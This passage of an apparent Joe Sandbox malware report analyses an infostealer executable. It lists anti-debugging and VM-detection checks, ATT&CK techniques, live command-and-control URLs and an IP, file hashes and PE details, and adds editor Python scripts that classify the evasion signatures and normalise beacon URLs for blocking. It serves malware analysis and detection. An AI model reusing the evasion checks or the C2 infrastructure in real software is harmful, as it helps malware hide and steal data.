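Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: r8nllkNEQX.exe | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: NTICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | File opened: SICE
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\r8nllkNEQX.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: procmon.exe
""".strip().splitlines()

# (category, technique label with ATT&CK id, pattern). First match wins, so the
# weak "Hyper-V RAW" rule sits before the VirtualBox-string rule and the explicit
# window-class list keeps ordinary windows (e.g. "Program Manager") unclassified.
RULES = [
    ("timing", "rdtsc delta check (T1497.003)",
     re.compile(r"RDTSC instruction interceptor|\brdtsc\b")),
    ("self-modifying", "self-modifying code (T1027)",
     re.compile(r"Self-modifying code")),
    ("vm-artifact", "BIOS / display-adapter registry fingerprint (T1497.001)",
     re.compile(r"SystemBiosVersion|VideoBiosVersion|4d36e968-e325-11ce-bfc1-08002be10318")),
    ("vm-artifact-weak", "Hyper-V RAW Winsock provider string, present on stock Windows 10 (weak)",
     re.compile(r"Hyper-V RAW")),
    ("vm-artifact", "VirtualBox artefact string (T1497.001)",
     re.compile(r"VBOX__|VBoxSF|VBox\*", re.I)),
    ("anti-debug", "ThreadHideFromDebugger (T1622)",
     re.compile(r"HideFromDebugger")),
    ("anti-debug", "ProcessDebugPort query (T1622)",
     re.compile(r"Process queried: DebugPort")),
    ("anti-debug", "SoftICE device name probe (T1622)",
     re.compile(r"File opened: (NTICE|SICE|SIWVID)\b")),
    ("analysis-tool", "debugger / Sysinternals window class (T1518.001)",
     re.compile(r"Open window title or class name: (regmonclass|gbdyllo|procmon_window_class|"
                r"filemonclass|ollydbg|process monitor|registry monitor|file monitor)")),
    ("analysis-tool", "analysis-tool process name string (T1518.001)",
     re.compile(r"memory string: .*\b(procmon|wireshark|x64dbg|ida|windbg)\.exe", re.I)),
    ("host-fingerprint", "MachineGuid read (T1082)",
     re.compile(r"MachineGuid")),
]


def classify(line):
    """Return (category, technique) for one report line, or None when no rule applies."""
    for category, technique, pattern in RULES:
        if pattern.search(line):
            return category, technique
    return None


def _indicator(line):
    """The concrete artefact a line reports: the address for interceptor hits,
    otherwise the text after the last ': ' separator."""
    m = re.search(r"First address: ([0-9A-Fa-f]+)", line)
    if m:
        return "0x" + m.group(1).upper()
    return line.rsplit(": ", 1)[-1].strip()


def summarize(lines):
    """Per-category hit counts plus the distinct indicators seen for each technique."""
    counts = Counter()
    indicators = defaultdict(set)
    for line in lines:
        hit = classify(line)
        if hit is None:
            continue
        category, technique = hit
        counts[category] += 1
        indicators[technique].add(_indicator(line))
    return counts, {k: sorted(v) for k, v in indicators.items()}


def unmatched(lines):
    """Lines no rule explains; these are the ones an analyst still reads by hand."""
    return [line for line in lines if classify(line) is None]


if __name__ == "__main__":
    counts, indicators = summarize(REPORT_LINES)
    for category, n in counts.most_common():
        print(f"{n:3d}  {category}")
    for technique, seen in indicators.items():
        print(f"{technique}: {', '.join(seen)}")
    print("unmatched:", unmatched(REPORT_LINES))
```

Feed it the full list of behaviour lines exported from a report: the per-technique indicator lists are what goes into the sandbox's hiding configuration (window classes to rename, device names to refuse, registry values to spoof), and whatever unmatched() returns is what still needs a human.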

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.8:49705 -> 91.149.241.220:80
MITRE ATT&CK matrix, rebuilt per tactic column (the page's cells run together on extraction; rows are kept in the page's order). A number in parentheses is the matched-signature count shown beside that technique; techniques without a number had no matching signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (23); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (23); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (4); Non-Application Layer Protocol (4); Application Layer Protocol (5); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
r8nllkNEQX.exe | 55% | ReversingLabs | Win32.Infostealer.Tinba
r8nllkNEQX.exe | 100% | Avira | TR/Crypt.TPM.Gen
r8nllkNEQX.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZ(%P | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZ | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fortth14vs.top | 91.149.241.220 | true | false | | high
httpbin.org | 34.200.57.114 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://html4/loose.dtd | r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | r8nllkNEQX.exe | false | | high
http://home.fortth14vs.top/gduZ(%P | r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | r8nllkNEQX.exe, r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/hsts.html# | r8nllkNEQX.exe | false | | high
http://home.fortth14vs.top/gduZ | r8nllkNEQX.exe, 00000000.00000003.1599645314.0000000001593000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600094570.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1600044768.00000000015A6000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606989887.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000003.1599729719.00000000015A0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963 | r8nllkNEQX.exe, 00000000.00000003.1600313001.0000000001532000.00000004.00000020.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1606792210.0000000001539000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html# | r8nllkNEQX.exe | false | | high
https://curl.se/docs/alt-svc.html | r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.css | r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://.jpg | r8nllkNEQX.exe, 00000000.00000003.1507111399.000000000738F000.00000004.00001000.00020000.00000000.sdmp, r8nllkNEQX.exe, 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.149.241.220 | home.fortth14vs.top | Poland | 41952 | MARTON-ASPL | false
34.200.57.114 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582706
                            Start date and time:2024-12-31 09:49:52 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 4m 19s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:3
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:r8nllkNEQX.exe
                            renamed because original name is a hash value
                            Original Sample Name:5d07283413428b07167fbcdbb4063558.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com
                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: r8nllkNEQX.exe
                            No simulations
IP context (other analyses that contacted the same IP)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
91.149.241.220 | yqUQPPp0LM.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
91.149.241.220 | ZN34wF8WI2.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
91.149.241.220 | Hqle5OSmLQ.exe | malicious | Unknown | home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.200.57.114 | ivHDHq51Ar.exe | malicious | Unknown |
Domain context (other analyses that resolved the same domain)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
home.fortth14vs.top | yqUQPPp0LM.exe | malicious | Unknown | 91.149.241.220
home.fortth14vs.top | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
home.fortth14vs.top | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
httpbin.org | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
httpbin.org | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
httpbin.org | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.202.253.164
httpbin.org | Set-up.exe | malicious | Unknown | 34.197.122.172
httpbin.org | Set-up.exe | malicious | Unknown | 52.73.63.247
httpbin.org | a2mNMrPxow.exe | malicious | Unknown | 3.218.7.103
httpbin.org | SgMuuLxOCJ.exe | malicious | LummaC | 34.226.108.155
httpbin.org | TNyOrM6mIM.exe | malicious | LummaC | 3.218.7.103
ASN context (other analyses that contacted the same ASN)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-AESUS | yqUQPPp0LM.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | ivHDHq51Ar.exe | malicious | Unknown | 34.200.57.114
AMAZON-AESUS | ZN34wF8WI2.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | Hqle5OSmLQ.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | PO_2024_056209_MQ04865_ENQ_1045.exe | malicious | MassLogger RAT, PureLog Stealer | 44.221.84.105
AMAZON-A ESUS | http://ghostbin.cafe24.com/ | malicious | Unknown | 44.199.56.69
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 52.202.253.164
AMAZON-AESUS | kwari.mips.elf | malicious | Unknown | 54.226.65.111
AMAZON-AESUS | Set-up.exe | malicious | Unknown | 34.197.122.172
AMAZON-AESUS | https://employeeportal.net-login.com/XL0pFWEloTnBYUmM5TnBUSmVpbWxiSUpWb3BBL1lPY1hwYU5uYktNWkd5ME82bWJMcUhoRklFUWJiVmFOUi9uUS81dGZ4dnJZYkltK2NMZG5BV1pmbFhqMXNZcm1QeXBXTXI4R090NHo5NWhuL2l4TXdxNlY4VlZxWHVPNTdnc1M3aU4xWjhFTmJiTEJWVUYydWVqZjNPbnFkM3M5T0FNQ2lRL3EySjhvdVVDNzZ2UHJQb0xQdlhZbTZRPT0tLTJaT0Z2TlJ3S0NMTTZjc2ktLTZGNUIwRnVkbFRTTHR2dUFITkcxVFE9PQ==?cid=2341891188 | malicious | KnowBe4 | 3.88.121.169
MARTON-ASPL | yqUQPPp0LM.exe | malicious | Unknown | 91.149.241.220
MARTON-ASPL | ZN34wF8WI2.exe | malicious | Unknown | 91.149.241.220
MARTON-ASPL | Hqle5OSmLQ.exe | malicious | Unknown | 91.149.241.220
MARTON-ASPL | mips.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | ppc.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | mpsl.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | arm5.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | arm7.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | harm4.elf | malicious | Unknown | 91.149.238.18
MARTON-ASPL | harm5.elf | malicious | Unknown | 91.149.238.18
                              No context
                              No context
                              No created / dropped files found
                              File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                              Entropy (8bit):7.984032462208184
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • VXD Driver (31/22) 0.00%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:r8nllkNEQX.exe
                              File size:4'509'696 bytes
                              MD5:5d07283413428b07167fbcdbb4063558
                              SHA1:0d59f6cfd46fd2a6351d26f983dffc495e8630d3
                              SHA256:30d0a42cbfa4c3ff9c23fe502c5abfef4910fd3a7997088e6b0ca512b50d53e2
                              SHA512:5ccc5c6ebffea5ca7b888806621d965ee5bb836dbf498d8ce9eebac4a320f0964502f97b7f5f683c6a1f0beb394cba4f4879d56b6ffb3f3a8cd1870655e2df91
                              SSDEEP:98304:UnJuRL9evlV9s50ltPpVbkzezPDlTLwBuKx7AEEI3:uJuRL9evlVa5OP/yKPZTLwBxx7Z
                              TLSH:3526330FEA116395C535E573D93781DFEAF45FBDB00BB85445A86220C24B8932EAFC89
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5rg...............(..M...w..2............M...@...................................E...@... ............................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x10a8000
                              Entrypoint Section:.taggant
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                              DLL Characteristics:DYNAMIC_BASE
                              Time Stamp:0x677235C4 [Mon Dec 30 05:55:16 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:2eabe9054cad5152567f0699947a2c5b
                              Signature Valid:
                              Signature Issuer:
                              Signature Validation Error:
                              Error Number:
                              Not Before, Not After
                                Subject Chain
                                  Version:
                                  Thumbprint MD5:
                                  Thumbprint SHA-1:
                                  Thumbprint SHA-256:
                                  Serial:
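Added example, not Joe Sandbox's code and not the sample's: it normalises the URL strings listed in the network tables above (a memory scan glues two URLs together, leaves format-string residue such as "(%P", and appends digits from a neighbouring field to the path), collapses them to one canonical beacon URL per host, and decodes the ten-digit decimal at the end of the path as a Unix epoch. Read that way, 1735537738 is 2024-12-30 05:48:58 UTC, 378 seconds before the PE TimeDateStamp 0x677235C4 (2024-12-30 05:55:16 UTC) in the header block above. The arithmetic is exact; the reading that the operator mints the path from the build time is my assumption, though the three other samples in the context tables that share the identical path are consistent with a per-build token. The epoch plausibility window and the residue heuristics are mine as well. Two things in the tables above should not be read as exoneration: Avira URL Cloud returns "safe" and the domain reputation reads "high" while the same URLs are flagged Malicious: true from behaviour, and httpbin.org/ip is a public IP-lookup service the sample calls, not attacker infrastructure. Note also that the header reports Digitally signed: true with every signature field blank, so nothing on this page validates a signer.

```python
"""Normalise the URL strings from this report and test whether the beacon path
carries a build-time token.

Added example: the residue heuristics, the epoch plausibility window and the
reading of the path's decimal suffix as a timestamp are the editor's, not Joe
Sandbox's logic and not code from the sample.
"""
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# Constructed sample input: URL strings as listed in the report above, including
# memory-scan artefacts (two URLs glued together, "(%P" format-string residue,
# digits from an adjacent field appended to the path).
OBSERVED_URLS = [
    "http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah",
    "http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0",
    "http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963",
    "http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18",
    "http://home.fortth14vs.top/gduZ(%P",
    "http://home.fortth14vs.top/gduZ",
    "http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738",
    "https://httpbin.org/ip",
    "https://httpbin.org/ipbefore",
    "https://curl.se/docs/hsts.html",
]

PE_TIMEDATESTAMP = 0x677235C4  # IMAGE_FILE_HEADER.TimeDateStamp from the PE header above

SCHEME_RE = re.compile(r"https?://")
# path = letters, then exactly ten decimal digits, then any digits glued on by the scan
TOKEN_PATH_RE = re.compile(r"^(?P<base>/[A-Za-z]+)(?P<epoch>\d{10})(?P<rest>\d*)$")
# plausibility window for a ten-digit epoch (editor's choice)
EPOCH_MIN = int(datetime(2015, 1, 1, tzinfo=timezone.utc).timestamp())
EPOCH_MAX = int(datetime(2035, 1, 1, tzinfo=timezone.utc).timestamp())


def split_fused(s):
    """A memory scan can glue two URLs together; cut at every scheme marker."""
    starts = [m.start() for m in SCHEME_RE.finditer(s)]
    return [s[a:b] for a, b in zip(starts, starts[1:] + [len(s)])]


def strip_residue(url):
    """Cut at the first '%' that is not a valid two-hex-digit escape (format-string
    residue such as '%P'), then drop a dangling '(' left in front of it."""
    m = re.search(r"%(?![0-9A-Fa-f]{2})", url)
    if m:
        url = url[: m.start()]
    return url.rstrip("(")


def normalize(urls):
    """Split, clean and de-duplicate while keeping first-seen order."""
    seen = []
    for raw in urls:
        for part in split_fused(raw):
            part = strip_residue(part)
            if part and part not in seen:
                seen.append(part)
    return seen


def beacon_candidates(urls):
    """URLs whose path is letters followed by a plausible Unix epoch, keyed by the
    canonical URL; query strings and glued-on digit suffixes are collected per key."""
    found = {}
    for url in urls:
        parts = urlsplit(url)
        m = TOKEN_PATH_RE.match(parts.path)
        if not m:
            continue
        epoch = int(m.group("epoch"))
        if not EPOCH_MIN <= epoch < EPOCH_MAX:
            continue
        key = f"{parts.scheme}://{parts.netloc}{m.group('base')}{m.group('epoch')}"
        entry = found.setdefault(key, {"epoch": epoch, "queries": set(), "suffixes": set()})
        if parts.query:
            entry["queries"].add(parts.query)
        if m.group("rest"):
            entry["suffixes"].add(m.group("rest"))
    return found


def epoch_utc(epoch):
    """Render a Unix epoch as a UTC timestamp string."""
    return datetime.fromtimestamp(epoch, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def build_time_offset(epoch, pe_timestamp=PE_TIMEDATESTAMP):
    """Seconds from the path token to the PE TimeDateStamp; positive means the
    token was minted before the binary was linked."""
    return pe_timestamp - epoch


if __name__ == "__main__":
    for url, info in beacon_candidates(normalize(OBSERVED_URLS)).items():
        print(url, epoch_utc(info["epoch"]),
              "queries:", sorted(info["queries"]), "glued:", sorted(info["suffixes"]))
        print("token precedes PE TimeDateStamp by", build_time_offset(info["epoch"]), "s")
```

The canonical URL is the value to block or hunt for; the query string and the glued-on digits are kept separately so a proxy-log search can match the beacon with or without its argument. When comparing against the other samples that share the path, a different epoch in the same base path would point at a rebuild rather than a new campaign, under the assumption stated above.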
                                  Instruction
                                  jmp 00007FFB28CD29FAh
                                  fxsave [eax+eax+00h]
                                  add byte ptr [eax], al
                                  add cl, ch
                                  add byte ptr [eax], ah
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [edi], al
                                  or al, byte ptr [eax]
                                  add byte ptr [edx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [ecx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [ebx], cl
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [ebx], al
                                  or al, byte ptr [eax]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [esi], al
                                  add byte ptr [eax], 00000000h
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  adc byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  or ecx, dword ptr [edx]
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  xor byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  pop ds
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
                                  add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x74c05f         0x73          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x74b000         0x2b0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x778200         0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xca5ff0         0x10          vnoaippe
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xca5fa0         0x18          vnoaippe
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
          0x1000           0x74a000      0x289000  ac126729e4272c25c3f198c0f4556dd0  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x74b000         0x2b0         0x200     6116b11220b00b610d7ed646765b30ae  False     0.796875            data                  6.061106673134527   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x74c000         0x1000        0x200     52564c2cea63394dbc4e71775ebabcc0  False     0.166015625         data                  1.1589685166080708  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          0x74d000         0x399000      0x200     89cf40f5f08a67402b662ba6d60c3b93  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
